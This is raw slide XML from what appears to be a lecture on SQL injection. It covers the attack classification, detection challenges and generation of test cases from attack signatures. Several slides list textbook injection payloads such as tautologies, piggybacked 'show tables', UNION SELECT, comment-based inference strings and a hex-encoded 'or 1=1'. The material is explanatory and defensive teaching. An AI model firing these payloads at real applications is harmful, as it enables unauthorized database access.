                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =‘admin’ or 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =‘’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210157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152400" y="647700"/>
            <a:ext cx="8610600" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37893" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1828799"/>
            <a:ext cx="8305800" cy="4740729"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SQL queries that are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dynamically generated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>supplied inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> may get their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>intended structures altered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Lack of input validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reported as #2 vulnerability by OWASP in 2010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Tautologies (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Anley</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 2001)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>’ or 1=1 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" dirty="0"/>
              <a:t>'greg' like  '%gr%’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Piggybacked queries (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Halfond</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 2005)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>’; show tables; --</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2320438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609600" y="571500"/>
            <a:ext cx="8229600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>SQL Injection attack classification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179204" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1621971"/>
            <a:ext cx="8382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81000" indent="-381000">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="800100" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="50000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1219200" indent="-304800">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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Arial" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1638300" indent="-266700">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="50000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2095500" indent="-266700">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2552700" indent="-266700" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3009900" indent="-266700" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3467100" indent="-266700" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3924300" indent="-266700" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>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Tautologies </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 or 1=1 – </a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="762000" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'greg' LIKE '%gr%’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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UNION queries</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 UNION SELECT  1,1 –</a:t>
            </a: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Illegal/logical incorrect queries</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 or 1 = (1 – </a:t>
            </a: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Piggybacked queries</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 show tables; --  </a:t>
            </a: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Inference attacks </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 /*! select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('1','2') */ \g -- (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </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vii) '; /*! select ‘1’ + ‘2’ */ \g -- (MS SQL)  </a:t>
            </a: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Alternate encodings (or Hex encoded queries)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="762000" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x206F7220313D31 (Hexadecimal representation of ‘” or 1=1‘).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stored procedures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396545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im3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="914400"/>
            <a:ext cx="7467600" cy="3486150"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12293" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="6208865"/>
            <a:ext cx="6085320" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tempus Sans ITC" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Source: http://www.theregister.co.uk/2008/01/21/riaa_hacktivism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12295" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="4387264"/>
            <a:ext cx="8077200" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>“The existence of an SQL injection attack on the RIAA's site came to light via social network news site … hackers turned the site into a blank slate, among other things.”</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" dirty="0"/>
              <a:t>“The RIAA has restored RIAA.org, although whether it's any more secure than before remains open to question” </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2741996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266700" y="607785"/>
            <a:ext cx="8610600" cy="723900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Challenges of SQLI attack detection approaches</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37893" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="419100" y="1768930"/>
            <a:ext cx="8305800" cy="4974770"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Meta character filtering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: Usually done by writing regular expressions, but attackers find meta character sequence to defeat the protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Static analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: Suffers from false positive warning and performs worse for scripting languages that have dynamic data types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prepared statement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: Limited support for implementation languages like Java and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and requires retrofitting the legacy code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Randomization of SQL keywords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: Requires modification of SQL database query engine, which may not be suitable for legacy application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4017757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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="674914"/>
            <a:ext cx="8534400" cy="628650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Test case generation: Attack signature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73733" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1859331"/>
            <a:ext cx="8534400" cy="4323755"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>some parts of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>normal URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>with attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>signatures</a:t>
